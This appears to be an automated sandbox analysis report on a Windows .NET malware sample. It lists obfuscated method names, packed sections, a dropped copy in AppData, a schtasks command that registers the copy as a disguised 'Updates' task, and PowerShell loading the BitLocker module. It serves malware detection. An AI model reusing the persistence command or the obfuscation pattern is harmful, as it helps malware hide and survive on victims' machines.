.Net Code: DS8NTsfENX System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_03259C30 push esp; retf 057Ah	13_2_03259D55
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8890D push es; ret	13_2_06F88920
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B0C890 push esp; iretd	14_2_04B0C899
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B2F05A push 00000040h; retf	14_2_04B2F05C
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF890D push es; ret	18_2_06DF8920

Source: 7495 P.exe	Static PE information: section name: .text entropy: 7.77859920149893
Source: HRrXXnBIpL.exe.2.dr	Static PE information: section name: .text entropy: 7.77859920149893

Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, dbsmttiiDVEb12vWOk.cs	High entropy of concatenated method names: 'xG8dBH9ukT', 'DGbdElAqQ6', 'rvZddNAJBp', 'Cafdq8pJn0', 'RhpdtxPJ0A', 'vXPdlI6XMZ', 'Dispose', 'ftbChj1Ab1', 'yAECnX6WDO', 'NRqC1b1JKa'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, nm4eSCpDGP9gMKV4GiU.cs	High entropy of concatenated method names: 'x9Sq3NQfUf', 'UwBqzJ03Dt', 'nOVJm96EoI', 'M2W2v5VyWAokuYZouGH', 'ytdL8SVgesT2W8aC7oR', 'rIojZ5V37qgDc3S8wQF'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, j63Fue4OaOaEKKJ7Gx.cs	High entropy of concatenated method names: 'xPNTSndIe', 'afOg2HvQi', 'KXPPVfj05', 'vyj9mJXO1', 'HNuoqWCTD', 'o8yRsMPnT', 'ipUHr10rX2BW6BZuQU', 'yJr9hPQyY9FBxP3ssH', 'xpDCGYo3C', 'sWxsX0pel'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, Hfl3wARIJIMmO3MV8y.cs	High entropy of concatenated method names: 'yNhXWNyfUb', 'pwcX9ANIIB', 'E6k12kFHKK', 'Csw1QdWVY3', 'A4v16TvkmF', 'ak71e8IhLa', 'vic1wSRRpR', 'Pbi1u5PNYC', 'NmC1M3oR6L', 'wZt1L6UlbN'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, zxLHAJppkLYQ89Jgl7Y.cs	High entropy of concatenated method names: 'sKhs3eEOAR', 'YgeszFLg6K', 'IuLqmTcqui', 'OtZqpjX0N6', 'b7iq4wxppn', 'OSeqDHnLvI', 'jGOqNGGgqH', 'hirqZ3bZWr', 'uFSqhrtkLN', 'Mb1qnFRwFl'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, n7Cr5vpNucstSTql7Fq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jq3Jdo1NTs', 'Mb6Jswlkn7', 'K8OJq9K9di', 'bnUJJGFqXY', 'lh2JtyPDuN', 'lt2JfINoft', 'MsLJlIc7lK'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, qkFlaUNh1nyJUrYxEi.cs	High entropy of concatenated method names: 'HsppKMu2NO', 'LqVpSRQXxS', 'fI4pFTHEfP', 'NDSpac2fl3', 'YMVpB8ytd2', 'y0LpOMK4aB', 'A10Yw6EsHyKO9Ujjky', 'U4mLrUO4DrQULbkNhT', 'BcyppeKohM', 'znCpD6rgEl'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, sYb4RfGC69bR4EKMe0.cs	High entropy of concatenated method names: 'Rky5Y5ACcW', 'eJB5oM0xpD', 'qeV5rEBObQ', 'K975Ia4baR', 'O4a5QaR2EI', 'aUC56LKBGM', 'eJb5wLFNEy', 'OHF5uaHdJR', 'RQm5LuOyXj', 'r265ySG2yZ'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, JfYgeIzJ2NnZOFTOmv.cs	High entropy of concatenated method names: 'DwAsPpkrYO', 'gLIsYwrAYG', 'aVMso7MbT8', 'wW4sriMP9k', 'YUQsIq9SnT', 'r5AsQCqNa6', 'tEIs6YY3Bc', 'd6bsleRGnX', 'u5XsHweati', 'VhVsUjhkiJ'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, jLj2jgV09kSwCs3sih.cs	High entropy of concatenated method names: 'ToString', 'YA4OybGb35', 'zlsOIKs5FX', 'bW0O2jdsCZ', 'MDUOQKXDX9', 'GLgO6AMHiY', 'KTOOeb4kkx', 'GyjOwJh1Fj', 'UUdOuxmFmP', 'GOOOMImxKY'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.cs	High entropy of concatenated method names: 'TZBDZjNBKN', 'NJhDhhknYu', 'zY2Dn6l0iB', 'P2rD1yqdeu', 'qSLDXpDPjm', 'FIHDcy1hpc', 'va7DKDy3wh', 'OXwDSNqU6E', 'NBTD0BL0LP', 'jPPDFawx4H'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, aMu2NOYwqVRQXxSL3P.cs	High entropy of concatenated method names: 'djDnA2ReSO', 'RqNn8qLhAh', 'XH1nVibYkq', 'OlfnbkXVLs', 'XdanxCuxuH', 'jMJnvX6r7A', 'HMyniCsYLq', 'Yaxn7xluHm', 'vX4njZZfCD', 'iGZn33Zt0U'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, un2dUUvNRE9V1TiVxJ.cs	High entropy of concatenated method names: 'y7wE7I6NrS', 'qVrE3AJaO2', 'WvrCmK7RJu', 'VC2CpgQ1h6', 'HZCEyJhbSZ', 'EnjEk59aUE', 'p9FEG18rti', 'rVDEALDJfm', 'y4lE8pslyb', 'AUTEVB1E3b'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, vd2U0LrMK4aBopMyr5.cs	High entropy of concatenated method names: 'Kq1cZbmk9j', 'yDncnjvL24', 'OEFcXmI742', 'kv8cK7yRtt', 'kZvcScfCDA', 'X3kXxXfoKt', 'RNgXvEj5my', 'gXLXi02kB7', 'md1X7jfcib', 'rf7XjBfvTE'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, ulHQ9gnCneNe2MIwFG.cs	High entropy of concatenated method names: 'Dispose', 'SEbpj12vWO', 'KLS4IU75v9', 'Oqc9U9A5tN', 'PiTp3hVlni', 'H13pzwSGd7', 'ProcessDialogKey', 'nUl4mW6VFl', 'n3p4pJkgwt', 'jJ2449QvYV'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, JG9j8XMoCb0SA5R7J8.cs	High entropy of concatenated method names: 'x4nKHpE4H4', 'zdPKU47p54', 'Q3CKTJvZRH', 'wcdKgpPOFU', 'KucKW54GJe', 'hsvKPQd3dL', 'cD2K9wj6DO', 'APJKY4jjSo', 'lg3KodM4OI', 'gjuKR5OlJ0'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, IdcCMfpmydm21tNVHI9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Prusy2kYyO', 'NN7skyGGrL', 'zJTsG43DXA', 'rRjsAuPURu', 'lO3s8cKHk0', 'F1esVDBo13', 'bESsbH5yhG'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, WGrvjlbbTfv3wMCCST.cs	High entropy of concatenated method names: 'bmxEFdCUfV', 'AK5EaLRhx7', 'ToString', 'v7eEh4qCQw', 'Pk8EnhRfVo', 'wr4E122iWl', 'aodEXZbjW1', 'fE4EcpVubB', 'InhEK5Q1Ys', 'M4FESHYTjc'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, zNQGChoI4THEfPLDSc.cs	High entropy of concatenated method names: 'xf31g25hMv', 'lAh1P1Vnnm', 'IMI1YfHNWl', 'Rbx1oKNUB7', 'uDB1BLLSah', 'x2Y1OXRm5Z', 'Q2j1EhW1wb', 'doa1CBBKeM', 'iJg1dIyt9r', 'qm41s4msOT'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, xW6VFlja3pJkgwtcJ2.cs	High entropy of concatenated method names: 'HNDdrmEAqE', 'a2PdI8BrZb', 'kOud2n4hLg', 'NJIdQGQZsC', 'KZMd6wntBA', 'Kp4deGtSJC', 'qxtdwTtCtd', 'v9AduPOyA5', 'i02dMAdCQu', 'TTydL17vAq'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, jNy4aY1rqZaqRkbjyD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VDx4jxqCmh', 'sxo43clMgf', 'QZa4zKPA1E', 'B5vDmrq3Sg', 'DtxDpqkTHK', 'jOjD4Mn6mh', 'n5wDDqKbb5', 'zu4prUrLA8BZuTGpDwo'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, gZl7bowfAG75dpC8i5.cs	High entropy of concatenated method names: 'iepKhSHU2G', 'NDWK1Dj0q5', 'wIUKcG2uhm', 'Vihc3S44nf', 'Gc8czn15YA', 'BeQKmNvOTS', 'hoYKpWBElF', 'yetK41LaHu', 'sstKD0Cvyu', 'epOKN5iDfD'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, CQvYVH3CQQSZ1ObM8J.cs	High entropy of concatenated method names: 'Qyis1ujF9s', 'IpssXNGqiU', 'O3Escneiwt', 'xpPsK77Bsa', 'ilvsdklRKy', 'YYrsSDrsvx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, uxQeYBp4xqx0pBaKFfR.cs	High entropy of concatenated method names: 'ToString', 'XO6qYci0On', 'TWQqoT9nhM', 'kvLqRy8kiH', 't8Eqr54LPW', 'wN4qIYfedv', 'b2dq2hCZ6Z', 'p4cqQkmpjO', 'yS93BnVNOUXmrfmIC0T', 'EeDxA7Vh5fdYVHYubdw'

Source: C:\Users\user\Desktop\7495 P.exe

File created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\7495 P.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
